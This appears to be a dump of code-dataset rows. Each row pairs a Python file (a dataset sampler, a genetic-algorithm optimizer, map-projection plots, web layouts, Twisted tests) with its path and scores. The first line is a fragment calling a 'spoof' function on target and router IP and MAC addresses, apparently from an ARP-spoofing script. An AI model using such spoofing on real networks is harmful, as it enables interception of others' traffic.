spoof(target_packet, router_packet, target_ip, target_mac, router_ip, router_mac) | 0.209389 | 0.093471 |
from tqdm import tqdm
import pandas as pd
import numpy as np
import os
os.chdir("/media/data/bderinbay/rvc_devkit/datasets/json_file/")
df_cats = pd.read_csv('categories.csv')
df_images = pd.read_csv('images.csv')
df_anno = pd.read_csv('annotations.csv')
sample_columns = ['image_id','bbox','category_id', 'category_name', 'file_name', 'height', 'width','ds_id']
df_sample = pd.DataFrame([], columns=sample_columns)
#return-> string: category name
def find_category(cat_id):
try:
return df_cats.name[df_cats.id == cat_id].values[0]
except:
return "no-catagory"
#return-> dict annoset counted as dataset
def get_dataset_counts(anno_set):
dataset_names = ['coco', 'objects365', 'oid', 'mvs']
anno_set_db = anno_set.groupby(['dataset_name']).count()
cols = [col for col in anno_set_db.columns if col not in ['dataset_name', 'id']]
anno_set_db = anno_set_db.drop(cols, axis=1)
anno_set_dbcount_dict = anno_set_db.to_dict()['id']
for dbname in dataset_names:
if(dbname not in anno_set_dbcount_dict.keys()):
anno_set_dbcount_dict[dbname] = 0
return anno_set_dbcount_dict
#drop mismatched columns and join two dataframe
df_joined = df_anno.set_index('image_id').join(df_images.set_index('id'))
for cat_id in tqdm_notebook(df_cats.id.values):
anno_set = df_joined[df_joined.category_id == cat_id]
db_count = get_dataset_counts(anno_set)
#increase the value for added annotations
limit = 200
db_quota = {'coco': 0, 'mvs': 0, 'objects365': 0, 'oid': 0}
df_sample = pd.DataFrame([], columns=sample_columns)
number_of_dataset=0
for x in db_count:
if(db_count[x] > 0):
number_of_dataset += 1
quota_foreach_db = int(limit / number_of_dataset)
for a in tqdm_notebook(anno_set.itertuples()):
if(db_quota[a.dataset_name] < quota_foreach_db):
df_a = pd.DataFrame([a])
df_a = df_a.rename(columns={"Index": "image_id"})
df_a['category_name'] = find_category(df_a['category_id'].values[0])
#df_a = df_a.set_index('Index', drop=True)
df_sample = df_sample.append(df_a)
db_quota[a.dataset_name]+=1
df_sample = df_sample.reset_index(drop=True) | scripts/dataset_sampler/json_sampler_v1_saved.py | from tqdm import tqdm
import pandas as pd
import numpy as np
import os
os.chdir("/media/data/bderinbay/rvc_devkit/datasets/json_file/")
df_cats = pd.read_csv('categories.csv')
df_images = pd.read_csv('images.csv')
df_anno = pd.read_csv('annotations.csv')
sample_columns = ['image_id','bbox','category_id', 'category_name', 'file_name', 'height', 'width','ds_id']
df_sample = pd.DataFrame([], columns=sample_columns)
#return-> string: category name
def find_category(cat_id):
try:
return df_cats.name[df_cats.id == cat_id].values[0]
except:
return "no-catagory"
#return-> dict annoset counted as dataset
def get_dataset_counts(anno_set):
dataset_names = ['coco', 'objects365', 'oid', 'mvs']
anno_set_db = anno_set.groupby(['dataset_name']).count()
cols = [col for col in anno_set_db.columns if col not in ['dataset_name', 'id']]
anno_set_db = anno_set_db.drop(cols, axis=1)
anno_set_dbcount_dict = anno_set_db.to_dict()['id']
for dbname in dataset_names:
if(dbname not in anno_set_dbcount_dict.keys()):
anno_set_dbcount_dict[dbname] = 0
return anno_set_dbcount_dict
#drop mismatched columns and join two dataframe
df_joined = df_anno.set_index('image_id').join(df_images.set_index('id'))
for cat_id in tqdm_notebook(df_cats.id.values):
anno_set = df_joined[df_joined.category_id == cat_id]
db_count = get_dataset_counts(anno_set)
#increase the value for added annotations
limit = 200
db_quota = {'coco': 0, 'mvs': 0, 'objects365': 0, 'oid': 0}
df_sample = pd.DataFrame([], columns=sample_columns)
number_of_dataset=0
for x in db_count:
if(db_count[x] > 0):
number_of_dataset += 1
quota_foreach_db = int(limit / number_of_dataset)
for a in tqdm_notebook(anno_set.itertuples()):
if(db_quota[a.dataset_name] < quota_foreach_db):
df_a = pd.DataFrame([a])
df_a = df_a.rename(columns={"Index": "image_id"})
df_a['category_name'] = find_category(df_a['category_id'].values[0])
#df_a = df_a.set_index('Index', drop=True)
df_sample = df_sample.append(df_a)
db_quota[a.dataset_name]+=1
df_sample = df_sample.reset_index(drop=True) | 0.174551 | 0.157008 |
import numpy as np
class BaseGenetics(object):
def __init__(self, e=None):
self.estimator = None
self.expectations = e # vector of math expectations for each component
def set_estimator(self, f):
def g(*args, **kwargs):
return f(*args, **kwargs)
self.estimator = g
def generate_population(self, qmin, qmax, h, m):
"""
Generate population.
(real, real, int, int) -> [h x m] np.array of reals
"""
population = {}
e = self.expectations
if e:
functional = self.estimate_object_function(e)
population[functional] = e
while len(population) < h:
candidate = np.random.normal(e, 0.03)
functional = self.estimate_object_function(candidate)
if functional < 1e+3: population[functional] = candidate
else:
while len(population) < h:
candidate = np.random.uniform(qmin, qmax, m)
functional = self.estimate_object_function(candidate)
if functional < 1e+3: population[functional] = candidate
return population
def estimate_object_function(self, q):
"""
Evaluates function self.estimator with q as an incoming parameter
(vector) -> real
"""
return self.estimator(q)
def get_best_individual(self, population, worst=False, ksearch=None):
"""
Return best or worst individual:
1) if ksearch != None and worst==False: return best individual
from ksearch random sample without replacement.
2) if ksearch == None and worst==True: return index of the worst
individual from the whole population.
(2d array of real, bool, int) -> array of real OR int
"""
population_estimates = np.array(list(population.keys()))
if ksearch and not worst:
try:
subpopulation_estimates = population_estimates[np.random.choice(population_estimates.shape[0], ksearch, replace=False)]
individual_estimate = subpopulation_estimates.min()
return (population[individual_estimate], individual_estimate)
except ValueError as e: print('Wrong type for ksearch: {0}'.format(e))
else:
best_estimate = population_estimates.min()
return (population[best_estimate], best_estimate)
def cross(self, population, ksearch):
"""
Processes crossover of some individuals.
(array of array of reals, int) -> (array of real, array of real) OR None
"""
best_individual, best_value = self.get_best_individual(population)
if len(best_individual) > 1:
parent1, parent1_est = self.get_best_individual(population, worst=False, ksearch=ksearch)
parent2, parent2_est = self.get_best_individual(population, worst=False, ksearch=ksearch)
if np.max([best_value/parent1_est, best_value/parent2_est])>np.random.uniform():
crossover_point = np.random.randint(1, len(parent1) - 1)
child1 = np.hstack((parent1[:crossover_point], parent2[crossover_point:]))
child2 = np.hstack((parent2[:crossover_point], parent1[crossover_point:]))
return (child1, child2)
else: return None
elif len(best_individual) == 1: return (best_individual[:], best_individual[:])
else: print('fuck you')
def mutate(self, children, qmin, qmax, p=1):
"""
Mutate given child1 and child2 with probability 'p'.
(array of real, array of real, real, real, real) -> None
"""
if np.random.rand() < p:
mutated_children = {}
for child in children:
child_gene = np.random.randint(child.shape[0])
child[child_gene] = np.random.uniform(qmin, qmax)
child_functional = self.estimate_object_function(child)
mutated_children[child_functional] = child
return mutated_children
else: return None
def insert_children(self, population, children):
"""
Replace the worst individuals with children, if they fit better.
(2d array of real, array of real, array of real) -> None
"""
merge = {**children, **population}
k = len(children)
estimates = list(merge.keys()) # unique estimates
bad_k = np.partition(estimates, k)[-k:]
for e in bad_k: del merge[e]
return merge
# psi_change_epoch <= individuals
# ksearch <= individuals
# variations_per_individuals >= 1
# g > 0
# crossings > 0
def optimize(self, qmin=1, qmax=4, individuals=1000, generations=10,
individual_len=3, crossings=256, ksearch=16):
print('Generating population for parametric optimization...')
population = self.generate_population(qmin, qmax, individuals, individual_len)
for g in range(generations):
for c in range(crossings):
children = self.cross(population, ksearch)
if children:
children = self.mutate(children, qmin, qmax)
population = self.insert_children(population, children)
if len(population) <= ksearch:
print('Population died out!')
best_individual, best_value = self.get_best_individual(population)
print('J: {0}, Q: {1}'.format(best_value, best_individual))
return best_individual, best_value
else: continue
best_individual, best_value = self.get_best_individual(population)
print('J: {0}, Q: {1}'.format(best_value, best_individual))
return best_individual, best_value
if __name__=='__main__':
estimator = lambda q: np.linalg.norm(np.array([1,2,3]) - q)
go = BaseGenetics()
go.set_estimator(estimator)
go.optimize() | synthesis_repo/genetic_opt.py | import numpy as np
class BaseGenetics(object):
def __init__(self, e=None):
self.estimator = None
self.expectations = e # vector of math expectations for each component
def set_estimator(self, f):
def g(*args, **kwargs):
return f(*args, **kwargs)
self.estimator = g
def generate_population(self, qmin, qmax, h, m):
"""
Generate population.
(real, real, int, int) -> [h x m] np.array of reals
"""
population = {}
e = self.expectations
if e:
functional = self.estimate_object_function(e)
population[functional] = e
while len(population) < h:
candidate = np.random.normal(e, 0.03)
functional = self.estimate_object_function(candidate)
if functional < 1e+3: population[functional] = candidate
else:
while len(population) < h:
candidate = np.random.uniform(qmin, qmax, m)
functional = self.estimate_object_function(candidate)
if functional < 1e+3: population[functional] = candidate
return population
def estimate_object_function(self, q):
"""
Evaluates function self.estimator with q as an incoming parameter
(vector) -> real
"""
return self.estimator(q)
def get_best_individual(self, population, worst=False, ksearch=None):
"""
Return best or worst individual:
1) if ksearch != None and worst==False: return best individual
from ksearch random sample without replacement.
2) if ksearch == None and worst==True: return index of the worst
individual from the whole population.
(2d array of real, bool, int) -> array of real OR int
"""
population_estimates = np.array(list(population.keys()))
if ksearch and not worst:
try:
subpopulation_estimates = population_estimates[np.random.choice(population_estimates.shape[0], ksearch, replace=False)]
individual_estimate = subpopulation_estimates.min()
return (population[individual_estimate], individual_estimate)
except ValueError as e: print('Wrong type for ksearch: {0}'.format(e))
else:
best_estimate = population_estimates.min()
return (population[best_estimate], best_estimate)
def cross(self, population, ksearch):
"""
Processes crossover of some individuals.
(array of array of reals, int) -> (array of real, array of real) OR None
"""
best_individual, best_value = self.get_best_individual(population)
if len(best_individual) > 1:
parent1, parent1_est = self.get_best_individual(population, worst=False, ksearch=ksearch)
parent2, parent2_est = self.get_best_individual(population, worst=False, ksearch=ksearch)
if np.max([best_value/parent1_est, best_value/parent2_est])>np.random.uniform():
crossover_point = np.random.randint(1, len(parent1) - 1)
child1 = np.hstack((parent1[:crossover_point], parent2[crossover_point:]))
child2 = np.hstack((parent2[:crossover_point], parent1[crossover_point:]))
return (child1, child2)
else: return None
elif len(best_individual) == 1: return (best_individual[:], best_individual[:])
else: print('fuck you')
def mutate(self, children, qmin, qmax, p=1):
"""
Mutate given child1 and child2 with probability 'p'.
(array of real, array of real, real, real, real) -> None
"""
if np.random.rand() < p:
mutated_children = {}
for child in children:
child_gene = np.random.randint(child.shape[0])
child[child_gene] = np.random.uniform(qmin, qmax)
child_functional = self.estimate_object_function(child)
mutated_children[child_functional] = child
return mutated_children
else: return None
def insert_children(self, population, children):
"""
Replace the worst individuals with children, if they fit better.
(2d array of real, array of real, array of real) -> None
"""
merge = {**children, **population}
k = len(children)
estimates = list(merge.keys()) # unique estimates
bad_k = np.partition(estimates, k)[-k:]
for e in bad_k: del merge[e]
return merge
# psi_change_epoch <= individuals
# ksearch <= individuals
# variations_per_individuals >= 1
# g > 0
# crossings > 0
def optimize(self, qmin=1, qmax=4, individuals=1000, generations=10,
individual_len=3, crossings=256, ksearch=16):
print('Generating population for parametric optimization...')
population = self.generate_population(qmin, qmax, individuals, individual_len)
for g in range(generations):
for c in range(crossings):
children = self.cross(population, ksearch)
if children:
children = self.mutate(children, qmin, qmax)
population = self.insert_children(population, children)
if len(population) <= ksearch:
print('Population died out!')
best_individual, best_value = self.get_best_individual(population)
print('J: {0}, Q: {1}'.format(best_value, best_individual))
return best_individual, best_value
else: continue
best_individual, best_value = self.get_best_individual(population)
print('J: {0}, Q: {1}'.format(best_value, best_individual))
return best_individual, best_value
if __name__=='__main__':
estimator = lambda q: np.linalg.norm(np.array([1,2,3]) - q)
go = BaseGenetics()
go.set_estimator(estimator)
go.optimize() | 0.604516 | 0.599778 |
def xyz2ll(x,y,z):
i_r = 1/numpy.sqrt(x*x + y*y + z*z)
sinlat = z*i_r
recip_coslat = 1/numpy.sqrt(1 - sinlat**2)
sinlon = (y*i_r)*recip_coslat
coslon = (x*i_r)*recip_coslat
rad2deg = 180/numpy.pi
lat = numpy.arcsin(sinlat)*rad2deg
sgn = numpy.maximum(numpy.sign(coslon),0)
lon0 = numpy.arcsin(sinlon)*rad2deg
lon1 = 180-numpy.arcsin(sinlon)*rad2deg
return (1-sgn)*lon1+sgn*lon0,lat
def ll2xyz(lon,lat):
deg2rad = numpy.pi/180
coslat = numpy.cos(deg2rad*lat)
return coslat*numpy.cos(deg2rad*lon), coslat*numpy.sin(deg2rad*lon), numpy.sin(deg2rad*lat)
def roty(x,y,z,a):
deg2rad = numpy.pi/180
ca,sa = numpy.cos(deg2rad*a), numpy.sin(deg2rad*a)
return ca*x-sa*z,y,ca*z+sa*x
def rotz(x,y,z,a):
deg2rad = numpy.pi/180
ca,sa = numpy.cos(deg2rad*a), numpy.sin(deg2rad*a)
return ca*x-sa*y,ca*y+sa*x,z
def drw_circles(subplot, projection, w=0.23, lw=3):
a = numpy.linspace(0,2*numpy.pi,32)
x,y,z=1,w*numpy.cos(a),w*numpy.sin(a)
ax=plt.subplot(subplot, projection=projection)
ax.plot(*xyz2ll(x,y,z),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*roty(x,y,z,60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*roty(x,y,z,-60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,-60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,-120)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,120)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot([-180,180,0,0],[0,0,89,-89],'w.',transform=cartopy.crs.PlateCarree())
drw_lines(ax)
ax.coastlines()
def drw_lines(ax, lon0=-70, lat0=-70, lon1=70, lat1=70, lw=2, ls='--', np=64):
# Straight line in lat-lon space
lons, lats = numpy.linspace(lon0, lon1, np), numpy.linspace(lat0, lat1, np)
ax.plot(lons,lats,ls,transform=cartopy.crs.PlateCarree(),linewidth=lw)
# Straight line in Mercator
x0,y0 = cartopy.crs.Mercator().transform_point(lon0,lat0,cartopy.crs.PlateCarree())
x1,y1 = cartopy.crs.Mercator().transform_point(lon1,lat1,cartopy.crs.PlateCarree())
xs, ys = numpy.linspace(x0, x1, np), numpy.linspace(y0, y1, np)
ax.plot(xs,ys,ls,transform=cartopy.crs.Mercator(),linewidth=lw)
# Straight line in NearsidePerspective
x0,y0,z0 = ll2xyz(lon0,lat0)
x1,y1,z1 = ll2xyz(lon1,lat1)
a = numpy.linspace(0,1,np)
lons,lats = xyz2ll(x0 + (x1-x0)*a, y0 + (y1-y0)*a, z0 + (z1-z0)*a)
ax.plot(lons,lats,ls,transform=cartopy.crs.PlateCarree(),linewidth=lw)
plt.figure(figsize=(10,10))
drw_circles(221, cartopy.crs.NearsidePerspective() ); plt.title('1a) Perspective')
drw_circles(222, cartopy.crs.PlateCarree() ); plt.title('1b) Equirectangular (Plate-Carrée)')
drw_circles(223, cartopy.crs.Robinson() ); plt.title('1c) Robinson')
drw_circles(224, cartopy.crs.Mercator() ); plt.title('1d) Mercator')
plt.tight_layout() | figure-scripts/some-projections.py | def xyz2ll(x,y,z):
i_r = 1/numpy.sqrt(x*x + y*y + z*z)
sinlat = z*i_r
recip_coslat = 1/numpy.sqrt(1 - sinlat**2)
sinlon = (y*i_r)*recip_coslat
coslon = (x*i_r)*recip_coslat
rad2deg = 180/numpy.pi
lat = numpy.arcsin(sinlat)*rad2deg
sgn = numpy.maximum(numpy.sign(coslon),0)
lon0 = numpy.arcsin(sinlon)*rad2deg
lon1 = 180-numpy.arcsin(sinlon)*rad2deg
return (1-sgn)*lon1+sgn*lon0,lat
def ll2xyz(lon,lat):
deg2rad = numpy.pi/180
coslat = numpy.cos(deg2rad*lat)
return coslat*numpy.cos(deg2rad*lon), coslat*numpy.sin(deg2rad*lon), numpy.sin(deg2rad*lat)
def roty(x,y,z,a):
deg2rad = numpy.pi/180
ca,sa = numpy.cos(deg2rad*a), numpy.sin(deg2rad*a)
return ca*x-sa*z,y,ca*z+sa*x
def rotz(x,y,z,a):
deg2rad = numpy.pi/180
ca,sa = numpy.cos(deg2rad*a), numpy.sin(deg2rad*a)
return ca*x-sa*y,ca*y+sa*x,z
def drw_circles(subplot, projection, w=0.23, lw=3):
a = numpy.linspace(0,2*numpy.pi,32)
x,y,z=1,w*numpy.cos(a),w*numpy.sin(a)
ax=plt.subplot(subplot, projection=projection)
ax.plot(*xyz2ll(x,y,z),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*roty(x,y,z,60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*roty(x,y,z,-60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,-60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,-120)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,120)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot([-180,180,0,0],[0,0,89,-89],'w.',transform=cartopy.crs.PlateCarree())
drw_lines(ax)
ax.coastlines()
def drw_lines(ax, lon0=-70, lat0=-70, lon1=70, lat1=70, lw=2, ls='--', np=64):
# Straight line in lat-lon space
lons, lats = numpy.linspace(lon0, lon1, np), numpy.linspace(lat0, lat1, np)
ax.plot(lons,lats,ls,transform=cartopy.crs.PlateCarree(),linewidth=lw)
# Straight line in Mercator
x0,y0 = cartopy.crs.Mercator().transform_point(lon0,lat0,cartopy.crs.PlateCarree())
x1,y1 = cartopy.crs.Mercator().transform_point(lon1,lat1,cartopy.crs.PlateCarree())
xs, ys = numpy.linspace(x0, x1, np), numpy.linspace(y0, y1, np)
ax.plot(xs,ys,ls,transform=cartopy.crs.Mercator(),linewidth=lw)
# Straight line in NearsidePerspective
x0,y0,z0 = ll2xyz(lon0,lat0)
x1,y1,z1 = ll2xyz(lon1,lat1)
a = numpy.linspace(0,1,np)
lons,lats = xyz2ll(x0 + (x1-x0)*a, y0 + (y1-y0)*a, z0 + (z1-z0)*a)
ax.plot(lons,lats,ls,transform=cartopy.crs.PlateCarree(),linewidth=lw)
plt.figure(figsize=(10,10))
drw_circles(221, cartopy.crs.NearsidePerspective() ); plt.title('1a) Perspective')
drw_circles(222, cartopy.crs.PlateCarree() ); plt.title('1b) Equirectangular (Plate-Carrée)')
drw_circles(223, cartopy.crs.Robinson() ); plt.title('1c) Robinson')
drw_circles(224, cartopy.crs.Mercator() ); plt.title('1d) Mercator')
plt.tight_layout() | 0.588534 | 0.646628 |
from cached_property import cached_property
from onegov.core.elements import Link
from onegov.wtfs import _
from onegov.wtfs.layouts.default import DefaultLayout
class ReportLayout(DefaultLayout):
@cached_property
def title(self):
return _("Report")
@cached_property
def breadcrumbs(self):
return [
Link(_("Homepage"), self.homepage_url),
Link(self.title, self.request.link(self.model))
]
@cached_property
def dates(self):
return "{}-{}".format(
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
class SpecificReportBaseLayout(DefaultLayout):
@cached_property
def subtitle(self):
return "{}-{}".format(
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
@cached_property
def editbar_links(self):
result = []
result.append(
Link(
text=_("Print"),
url='#',
attrs={
'class': 'print-icon',
'onclick': 'window.print();return false;'
}
)
)
return result
@cached_property
def breadcrumbs(self):
return [
Link(_("Homepage"), self.homepage_url),
Link(_("Report"), self.report_url),
Link(self.title, "#"),
Link(self.subtitle, self.request.link(self.model)),
]
class ReportBoxesLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes")
class ReportBoxesAndFormsLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes and forms")
class ReportFormsByMunicipalityLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report forms")
@cached_property
def subtitle(self):
return "{} {}-{}".format(
self.model.municipality_name,
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
class ReportFormsAllMunicipalitiesLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report forms of all municipalities")
class ReportBoxesAndFormsByDeliveryLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes and forms by delivery")
@cached_property
def subtitle(self):
return "{} ({}) {}-{}".format(
self.model.municipality.name,
self.model.municipality.bfs_number,
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
) | src/onegov/wtfs/layouts/report.py | from cached_property import cached_property
from onegov.core.elements import Link
from onegov.wtfs import _
from onegov.wtfs.layouts.default import DefaultLayout
class ReportLayout(DefaultLayout):
@cached_property
def title(self):
return _("Report")
@cached_property
def breadcrumbs(self):
return [
Link(_("Homepage"), self.homepage_url),
Link(self.title, self.request.link(self.model))
]
@cached_property
def dates(self):
return "{}-{}".format(
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
class SpecificReportBaseLayout(DefaultLayout):
@cached_property
def subtitle(self):
return "{}-{}".format(
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
@cached_property
def editbar_links(self):
result = []
result.append(
Link(
text=_("Print"),
url='#',
attrs={
'class': 'print-icon',
'onclick': 'window.print();return false;'
}
)
)
return result
@cached_property
def breadcrumbs(self):
return [
Link(_("Homepage"), self.homepage_url),
Link(_("Report"), self.report_url),
Link(self.title, "#"),
Link(self.subtitle, self.request.link(self.model)),
]
class ReportBoxesLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes")
class ReportBoxesAndFormsLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes and forms")
class ReportFormsByMunicipalityLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report forms")
@cached_property
def subtitle(self):
return "{} {}-{}".format(
self.model.municipality_name,
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
class ReportFormsAllMunicipalitiesLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report forms of all municipalities")
class ReportBoxesAndFormsByDeliveryLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes and forms by delivery")
@cached_property
def subtitle(self):
return "{} ({}) {}-{}".format(
self.model.municipality.name,
self.model.municipality.bfs_number,
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
) | 0.778607 | 0.095898 |
import operator
from xml.etree import ElementTree as ET
import cStringIO as StringIO
import json
from twisted.trial import unittest
from twisted.internet import defer, tcp
from twisted.web import resource, server
from twisted.web.test import requesthelper
from reqpi.robot import hash as rrhash
from zope.interface import verify
def _render(resource, request):
result = resource.render(request)
if isinstance(result, str):
request.write(result)
request.finish()
return defer.succeed(None)
elif result is server.NOT_DONE_YET:
if request.finished:
return defer.succeed(None)
else:
return request.notifyFinish()
else:
raise ValueError("Unexpected return value: %r" % (result,))
class DummyStore(object):
def __init__(self):
self.stuffs = []
self.versions = {}
def add(self, stuff):
self.stuffs.append(stuff)
return 'hello'
def version(self, sha, name):
return self.versions[sha, name]
class HashTest(unittest.TestCase):
def setUp(self):
self.store = DummyStore()
self.locations = {}
def locate(*args):
return defer.maybeDeferred(operator.getitem, self.locations, args)
self.resource = rrhash.Hash(self.store, locate,
'http://testing.org:123')
def test_iface(self):
verify.verifyObject(resource.IResource, self.resource)
def test_leafiness(self):
self.assertTrue(self.resource.isLeaf)
with self.assertRaises(Exception):
self.resource.putChild('lala', None)
with self.assertRaises(Exception):
self.resource.getChildWithDefault(None, None)
def test_POST(self):
request = requesthelper.DummyRequest([''])
request.method = 'POST'
request.uri = '/robot/hash'
request.content = StringIO.StringIO(json.dumps(dict(requirements='')))
request.getHost = lambda: tcp.Port(1555, None)
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
resp = json.loads(''.join(request.written))
url = resp.pop('url')
url, slug = url.rsplit('/', 1)
self.assertEquals(resp, {})
self.assertEquals(url, 'http://testing.org:123/robot/hash')
self.assertNotEquals(slug, '')
return d
def test_POST_without_baseurl(self):
def locate(*args):
return defer.maybeDeferred(operator.getitem, self.locations, args)
self.resource = rrhash.Hash(self.store, locate, baseurl=None)
request = requesthelper.DummyRequest([''])
request.method = 'POST'
request.uri = '/robot/hash'
request.content = StringIO.StringIO(json.dumps(dict(requirements='')))
request.getHost = lambda: tcp.Port(1555, None)
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
resp = json.loads(''.join(request.written))
url = resp.pop('url')
url, slug = url.rsplit('/', 1)
self.assertEquals(resp, {})
self.assertEquals(url, 'http://dummy:1555/robot/hash')
self.assertNotEquals(slug, '')
return d
def test_no_OPTIONS(self):
request = requesthelper.DummyRequest([''])
request.method = 'OPTIONS'
with self.assertRaises(server.UnsupportedMethod):
_render(self.resource, request)
def test_GET_package(self):
self.store.versions['111', 'twisted'] = 'Twisted', '15.5'
self.locations['Twisted', '15.5'] = 'lalal/Twisted-15.5.tar.gz'
request = requesthelper.DummyRequest(['111', 'twisted', ''])
request.method = 'GET'
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
html = ''.join(request.written)
parsed = ET.fromstring(html)
link, = parsed.iter('a')
href = link.attrib['href']
head, tail = href.rsplit('/', 1)
self.assertEquals(tail, 'Twisted-15.5.tar.gz')
return d
def test_bad_GET(self):
request = requesthelper.DummyRequest(['111', 'twisted'])
request.method = 'GET'
with self.assertRaises(NotImplementedError):
_render(self.resource, request)
def test_failed_GET_package(self):
self.store.versions['111', 'twisted'] = 'Twisted', '15.5'
request = requesthelper.DummyRequest(['111', 'twisted', ''])
request.method = 'GET'
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
html = ''.join(request.written)
parsed = ET.fromstring(html)
self.assertEquals(list(parsed.iter('a')), [])
res = self.flushLoggedErrors()
self.assertEquals(len(res), 1)
return d | reqpi/test/test_robot/test_hash.py | import operator
from xml.etree import ElementTree as ET
import cStringIO as StringIO
import json
from twisted.trial import unittest
from twisted.internet import defer, tcp
from twisted.web import resource, server
from twisted.web.test import requesthelper
from reqpi.robot import hash as rrhash
from zope.interface import verify
def _render(resource, request):
result = resource.render(request)
if isinstance(result, str):
request.write(result)
request.finish()
return defer.succeed(None)
elif result is server.NOT_DONE_YET:
if request.finished:
return defer.succeed(None)
else:
return request.notifyFinish()
else:
raise ValueError("Unexpected return value: %r" % (result,))
class DummyStore(object):
def __init__(self):
self.stuffs = []
self.versions = {}
def add(self, stuff):
self.stuffs.append(stuff)
return 'hello'
def version(self, sha, name):
return self.versions[sha, name]
class HashTest(unittest.TestCase):
def setUp(self):
self.store = DummyStore()
self.locations = {}
def locate(*args):
return defer.maybeDeferred(operator.getitem, self.locations, args)
self.resource = rrhash.Hash(self.store, locate,
'http://testing.org:123')
def test_iface(self):
verify.verifyObject(resource.IResource, self.resource)
def test_leafiness(self):
self.assertTrue(self.resource.isLeaf)
with self.assertRaises(Exception):
self.resource.putChild('lala', None)
with self.assertRaises(Exception):
self.resource.getChildWithDefault(None, None)
def test_POST(self):
request = requesthelper.DummyRequest([''])
request.method = 'POST'
request.uri = '/robot/hash'
request.content = StringIO.StringIO(json.dumps(dict(requirements='')))
request.getHost = lambda: tcp.Port(1555, None)
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
resp = json.loads(''.join(request.written))
url = resp.pop('url')
url, slug = url.rsplit('/', 1)
self.assertEquals(resp, {})
self.assertEquals(url, 'http://testing.org:123/robot/hash')
self.assertNotEquals(slug, '')
return d
def test_POST_without_baseurl(self):
def locate(*args):
return defer.maybeDeferred(operator.getitem, self.locations, args)
self.resource = rrhash.Hash(self.store, locate, baseurl=None)
request = requesthelper.DummyRequest([''])
request.method = 'POST'
request.uri = '/robot/hash'
request.content = StringIO.StringIO(json.dumps(dict(requirements='')))
request.getHost = lambda: tcp.Port(1555, None)
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
resp = json.loads(''.join(request.written))
url = resp.pop('url')
url, slug = url.rsplit('/', 1)
self.assertEquals(resp, {})
self.assertEquals(url, 'http://dummy:1555/robot/hash')
self.assertNotEquals(slug, '')
return d
def test_no_OPTIONS(self):
request = requesthelper.DummyRequest([''])
request.method = 'OPTIONS'
with self.assertRaises(server.UnsupportedMethod):
_render(self.resource, request)
def test_GET_package(self):
self.store.versions['111', 'twisted'] = 'Twisted', '15.5'
self.locations['Twisted', '15.5'] = 'lalal/Twisted-15.5.tar.gz'
request = requesthelper.DummyRequest(['111', 'twisted', ''])
request.method = 'GET'
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
html = ''.join(request.written)
parsed = ET.fromstring(html)
link, = parsed.iter('a')
href = link.attrib['href']
head, tail = href.rsplit('/', 1)
self.assertEquals(tail, 'Twisted-15.5.tar.gz')
return d
def test_bad_GET(self):
request = requesthelper.DummyRequest(['111', 'twisted'])
request.method = 'GET'
with self.assertRaises(NotImplementedError):
_render(self.resource, request)
def test_failed_GET_package(self):
self.store.versions['111', 'twisted'] = 'Twisted', '15.5'
request = requesthelper.DummyRequest(['111', 'twisted', ''])
request.method = 'GET'
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
html = ''.join(request.written)
parsed = ET.fromstring(html)
self.assertEquals(list(parsed.iter('a')), [])
res = self.flushLoggedErrors()
self.assertEquals(len(res), 1)
return d | 0.5083 | 0.186576 |
from enum import Enum
from uuid import UUID
from pydantic.types import constr, conint
from app import create_api_router, VoteDefinition, VoteAggregation
def most_voted(mongo_votes):
values = dict()
for mongo_vote in mongo_votes:
if mongo_vote["value"] in values:
values[mongo_vote["value"]] += 1
else:
